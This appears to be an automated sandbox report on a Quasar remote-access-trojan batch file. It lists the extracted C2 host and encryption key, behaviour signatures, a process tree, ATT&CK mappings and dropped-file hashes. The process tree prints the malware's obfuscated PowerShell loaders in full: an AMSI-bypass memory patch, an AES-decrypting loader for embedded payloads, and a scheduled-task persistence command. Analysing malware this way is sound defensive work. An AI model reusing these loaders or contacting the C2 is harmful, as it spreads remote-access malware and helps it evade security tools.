Analysis
-
max time kernel
600s -
max time network
455s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
02-05-2024 20:56
General
-
Target
R0X-Built.bat
-
Size
326KB
-
MD5
d967ead2d930328fe784be4e199cca49
-
SHA1
cfe200ede38b0c10638d181d64ce202c58b01ba1
-
SHA256
fcedeca6396c7c129f169f635085b84a0af4ab5d1043affe837c96640642230a
-
SHA512
b63459d12140f400539b7233cf8854df6f2805f9f09a902df6fe20649b8af27be408ae667b4101444ce5b1848e4b37383a309c4962e55709c2fe11410a47ee71
-
SSDEEP
6144:bx2lEdv93qPAK5WiwSRae50rX3cvmZi8pSOeAxqDpWStZ9qnR:b1dYPmmH5Tm88pnecqDp3AR
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
Slave
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-3vDee7FzoJnhqjuE3n
Attributes
-
encryption_key
KaNwItdY6wlv5nCN4prL
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 19 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3e7dcb77-deac-4249-8274-52ae18bffc4b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gbPPqYhBKhQJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OiGvvbbydeyeqc,[Parameter(Position=1)][Type]$GcYRuOgCsU)$DXFyQbhMMJj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+'yModu'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'Pu'+'b'+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+'e'+[Char](97)+'l'+[Char](101)+''+'d'+','+[Char](65)+'n'+[Char](115)+''+'i'+'C'+'l'+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'C'+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$DXFyQbhMMJj.DefineConstructor(''+'R'+''+[Char](84)+'Spe'+[Char](99)+''+'i'+''+'a'+''+'l'+''+[Char](78)+''+'a'+'me'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+'P'+'u'+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OiGvvbbydeyeqc).SetImplementationFlags('Ru'+'n'+''+'t'+'im'+'e'+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$DXFyQbhMMJj.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+[Char](101)+'','Pu'+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+'N'+''+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$GcYRuOgCsU,$OiGvvbbydeyeqc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $DXFyQbhMMJj.CreateType();}$NlagoxVSKOWmG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+'2'+'.'+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$DZECRFWNHfWtxO=$NlagoxVSKOWmG.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+[Char](111)+''+'c'+''+'A'+'d'+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qGSZIbUhJlWXrVQUblw=gbPPqYhBKhQJ @([String])([IntPtr]);$GHIQyrKxFFMiLfRwYOgUHr=gbPPqYhBKhQJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fFvSyJPUNHa=$NlagoxVSKOWmG.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$YnyNNInYkQXzMo=$DZECRFWNHfWtxO.Invoke($Null,@([Object]$fFvSyJPUNHa,[Object](''+[Char](76)+'oa'+'d'+'L'+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$IebbNLzFfWMhgDgis=$DZECRFWNHfWtxO.Invoke($Null,@([Object]$fFvSyJPUNHa,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$pUptXGU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YnyNNInYkQXzMo,$qGSZIbUhJlWXrVQUblw).Invoke(''+'a'+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+''+'l'+'l');$IlpWkRgEtpfpPYMwX=$DZECRFWNHfWtxO.Invoke($Null,@([Object]$pUptXGU,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$WpXzAFZIZE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IebbNLzFfWMhgDgis,$GHIQyrKxFFMiLfRwYOgUHr).Invoke($IlpWkRgEtpfpPYMwX,[uint32]8,4,[ref]$WpXzAFZIZE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IlpWkRgEtpfpPYMwX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IebbNLzFfWMhgDgis,$GHIQyrKxFFMiLfRwYOgUHr).Invoke($IlpWkRgEtpfpPYMwX,[uint32]8,0x20,[ref]$WpXzAFZIZE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kV2tB9nO4F4vksE1XanCNN0CKaoOh+Fwv5J9FKyM/rQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GDJTUCxdRiEvidahg0KvVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qBwZy=New-Object System.IO.MemoryStream(,$param_var); $HWMGu=New-Object System.IO.MemoryStream; $jHVMR=New-Object System.IO.Compression.GZipStream($qBwZy, [IO.Compression.CompressionMode]::Decompress); $jHVMR.CopyTo($HWMGu); $jHVMR.Dispose(); $qBwZy.Dispose(); $HWMGu.Dispose(); $HWMGu.ToArray();}function execute_function($param_var,$param2_var){ $RLZnq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DuryM=$RLZnq.EntryPoint; $DuryM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat';$fOqeP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat').Split([Environment]::NewLine);foreach ($ishbx in $fOqeP) { if ($ishbx.StartsWith(':: ')) { $wXPsE=$ishbx.Substring(3); break; }}$payloads_var=[string[]]$wXPsE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 0ac351f679f16131bf483f9d9272d4be RgOtiRwnGUqUvS+PU69TlQ.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\USOPrivate\UpdateStore\store.dbFilesize
60KB
MD5c37a1a82bb6e375c1030db9eb7c71b2f
SHA1655f1dc84c2eeac5f8a6fce50d96067858d529f3
SHA2562b1230218e8d097ce194424c48acbd729d0a080c20aa3e29f1fa6ad08b706bee
SHA5125a1a30106f24a0f7ac055d5e0f18ddb7d77dfded9eca248f0e0c096a22525884cc0ba2591cfc935f0f2722fe96b1e5c46917c5fa191517cce2cdd2988f394d02
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
330B
MD564c6905529646a14d5ce0b81abcf8d4c
SHA1905127540662d2e25e09562ecc3fa148f79ed369
SHA256e06a48a96f9d851bcc10260041ebb4d4a059aacefce8d71b4cdd96fbda0d7426
SHA512795e8d985dabd0e0a01dbb87b0f11c869a2a16bccc6fd7cb077da0dc98b273c4898e5b2dd55110ccda2accc7c9d4d8b99ef2e7c6a2834888cc528ec13a998d85
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD5ea1a04cf85d4cdc4d4da0ba3f087b85c
SHA10c4dfd0756c9f34ec2e4142d14f4a2e8e9d8e415
SHA2562d4cd45fd5d770647b8deae15dc5787b3c994f2761df3c5aabe3d2d7421f02f9
SHA512382f6ebc37528bf3054f8d24c04f4dd0c481223f44567b2df5e2832c48f8d130f0eb75f05443e34db2ac7f85c7bd464dadf609a1f6fec1edb8b1ee231353cb7a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxpnkx2t.dg5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
